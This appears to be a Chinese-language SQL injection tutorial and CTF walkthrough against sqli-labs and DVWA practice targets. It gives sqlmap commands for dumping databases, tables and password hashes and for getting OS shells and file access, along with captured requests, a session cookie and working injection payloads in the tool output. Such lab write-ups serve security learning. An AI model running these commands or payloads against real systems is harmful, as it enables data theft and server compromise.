靶场 : https://buuoj.cn/challenges#sqli-labs

SQL注入的基本战术

1.Union注入
2.Boolean注入
3.报错注入
4.时间注入
5.堆叠注入
6.二次注入
7.宽字节注入
8.大小写绕过注入
9.编码绕过注入
10.内联注释绕过注入

命令操作

扫描

sqlmap -u 'url+参数'

添加cookie --cookie

sqlmap -u 'url+参数' --cookie '内容'

获取数据库 --dbs

sqlmap -u 'url+参数' --cookie '内容' --dbs

获取数据库中的表名 --tables

sqlmap -u 'url+参数' --cookie '内容' -D 库名 --tables

获取表中字段名 --columns

sqlmap -u 'url+参数' --cookie '内容' -D 库名 -T 表名 --columns

获取字段内容 --dump

sqlmap -u 'url+参数' --cookie '内容' -D 库名 -T 表名 -C 字段名 --dump

获取当前数据库用户名 --current-user

获取当前用户名的密码 --passwords --thread 10 --hex

其他命令

--sql-shell 运行自定义sQL语句
--os-shell 运行任意操作系统命令
--file-read 从数据库服务器中读取文件
--file-write  & --file-dest 上传文件到数据库服务器中 

GET请求 F12制作请求文本

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=low; PHPSESSID=is56nfk4e80i5l3ia2qohge711

SQLMAP重放GET请求文本

sqlmap -r get-sql.txt

PSOST请求 F12制作请求文本

POST /DVWA/vulnerabilities/sqli/ HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Content-Length: 18
Cache-Control: max-age=0
Origin: http://144.34.183.197
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=medium; PHPSESSID=is56nfk4e80i5l3ia2qohge711

id=2&Submit=Submit

SQLMAP 重放POST请求文本

sqlmap -r post-sql.txt 

POST请求获取数据库

sqlmap -r post-sql.txt --dbs

POST请求获取表

sqlmap -r post-sql.txt -D dvwa --tables

POST获取字段

sqlmap -r post-sql.txt -D dvwa -T users --columns

POST获取字段内容

sqlmap -r post-sql.txt -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

思路

1、找注入点
2、查库
3、查表
4、查字段
5、查字段内容

复现

测试是否有注入点

命令

sqlmap -u 'http://0304b195-766f-4341-a524-f071ce989dbb.node3.buuoj.cn/Less-1/?id=1' 
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3419=3419 AND 'zuYD'='zuYD

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2163 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2163=2163,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RrFe'='RrFe

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1890 FROM (SELECT(SLEEP(5)))fMhm) AND 'DOml'='DOml

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8155' UNION ALL SELECT NULL,CONCAT(0x717a717671,0x6e487266744f415a49716e4846736d63687a6d4964676f4a44766a4b75554b78444a7a69766e5a67,0x716b787071),NULL-- -
---
[12:26:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:26:30] [INFO] fetched data logged to text files under '/home/jxl/.local/share/sqlmap/output/bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn'

[*] ending @ 12:26:30 /2020-10-16/

获取数据库

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' --dbs

available databases [6]:                                                                                                                                                                                                                  
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

获取表

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining --tables

Database: ctftraining

[3 tables]
flag
news
users

获取字段

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag --columns

Database: ctftraining
Table: flag

[1 column]
ColumnType
flagchar(128)

获取字段内容

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -C flag --dump
Database: ctftraining
Table: flag

[1 entry]
flag
flag{08e532cb-255c-48c0-bf7d-c1b2b2d6c859}